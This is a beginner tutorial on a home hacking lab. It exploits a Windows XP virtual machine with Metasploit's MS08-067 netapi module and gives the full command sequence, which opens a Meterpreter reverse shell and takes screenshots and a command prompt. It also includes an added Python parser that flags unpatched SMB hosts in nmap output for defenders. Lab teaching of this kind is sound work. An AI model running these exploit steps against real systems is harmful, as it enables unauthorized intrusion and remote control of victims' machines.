In Part 1, we learned how to set up a hacking lab to practice in, since our objective is to hack without disrupting any real network or services. In this article, I will discuss how to actually start hacking on your own. Please note that I will be using Metasploit as the primary hacking tool. Metasploit is a huge collection of ready-to-use exploits, which makes life easier for a penetration tester or ethical hacker. Metasploit comes pre-installed with Backtrack, so you don't need to do any extra installation. However, if you want to use a Windows machine as the attacker machine, you can download Metasploit for Windows as well (around 390MB).
In this hack, I will be exploiting Windows XP using the famous netapi exploit (don't worry if you don't know what that is yet). I'm showing this exploit because it works every time and is easy to demonstrate, especially for beginners.
I will be using Backtrack as the attacker and Windows XP as the victim, as configured in Part 1.
Start up the Backtrack machine and log in with the username root and the password toor.
After that, type startx to start the GUI. You are now greeted with the Backtrack interface; you can browse through all the menus and try out the tools.
First, we will perform a port scan to see the open ports and (hopefully) find out the victim's operating system. Type nmap -O 192.168.56.106 like so:
Now we know that our victim is running Windows XP SP2 or Windows Server 2003 and that port 445 is open. So we can run the netapi exploit using Metasploit.
Alternatively, you can open a terminal and type msfconsole.
You now have the Metasploit console open and can start typing in commands.
Type the following:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.101
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.106
msf exploit(ms08_067_netapi) > exploit
Note: LHOST is your (attacker) IP address, the one Meterpreter will connect back to. RHOST is the victim's IP address.
After typing all that, if you see a meterpreter shell open like below, then congratulations!
It means you were successful in exploiting the XP system.
Meterpreter is the reverse shell we opened after exploiting the victim's computer: the payload connects back from the victim to LHOST. Now that you have a Meterpreter session, you can do virtually anything with that system.
Type help to see all available commands.
Let's grab a screenshot of the victim's desktop: type screenshot.
To get the command prompt of the remote system, type shell. After you get the shell, type ipconfig to prove that you are indeed on the XP system. You can now do virtually anything with the system.
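The nmap -O step above is also the quickest way for a defender to find hosts like this one on their own LAN: an end-of-life Windows box that still exposes SMB on 139/445 is exactly what should be isolated or patched before anyone else finds it. The following parser is an added example, not part of the original tutorial or of nmap or Metasploit; the scan report it reads is constructed to look like nmap's normal output, and the host, MAC and OS strings are made up.

```python
import re

# Constructed sample in the style of `nmap -O` normal output (not real scan data).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.56.106
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
MAC Address: 08:00:27:AA:BB:CC (Cadmus Computer Systems)
Running: Microsoft Windows XP|2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
Nmap scan report for 192.168.56.101
Host is up (0.00021s latency).
PORT     STATE SERVICE
22/tcp   open  ssh
OS details: Linux 2.6.32 - 2.6.39
"""

SMB_PORTS = {139, 445}
EOL_OS_MARKERS = ("windows xp", "windows server 2003")


def parse_nmap_report(text):
    """Return {host: {"ports": set_of_open_tcp_ports, "os": os_details}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:                                   # new host block starts
            current = m.group(1)
            hosts[current] = {"ports": set(), "os": ""}
            continue
        if current is None:
            continue
        m = re.match(r"(\d+)/tcp\s+open\s", line)
        if m:                                   # "445/tcp  open  microsoft-ds"
            hosts[current]["ports"].add(int(m.group(1)))
        elif line.startswith("OS details:"):
            hosts[current]["os"] = line.split(":", 1)[1].strip()
    return hosts


def smb_exposure_findings(hosts):
    """List (host, exposed SMB ports, OS) for EOL Windows hosts that expose SMB."""
    findings = []
    for host, info in hosts.items():
        exposed = sorted(SMB_PORTS & info["ports"])
        is_eol = any(marker in info["os"].lower() for marker in EOL_OS_MARKERS)
        if exposed and is_eol:
            findings.append((host, exposed, info["os"]))
    return findings
```

Feed it the saved output of a scan of your own lab network and every hit is a host to patch or to wall off from port 445 at the host firewall.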
If you have done all the steps correctly, you have just managed your first actual hack with Metasploit. This is just the beginning. You can find more exploits for Windows XP and Windows 7 as well. Install a Windows 7 virtual machine and keep trying out new exploits. In this tutorial, we learned how to use Metasploit to run a basic exploit against a remote computer on the LAN, which means you have successfully performed your first network hack. I highly suggest you try out this hack, as it will really help you get started in the world of hacking.
In order to learn more about Metasploit, you can visit www.securitytube.net.
Note: You have to update Metasploit regularly to get the latest exploits by typing msfupdate. However, since we have used the VirtualBox Host-Only Adapter, there is no internet connectivity. To connect BackTrack to the internet, power it off and set the adapter to NAT (in the VirtualBox menu, under Network Settings).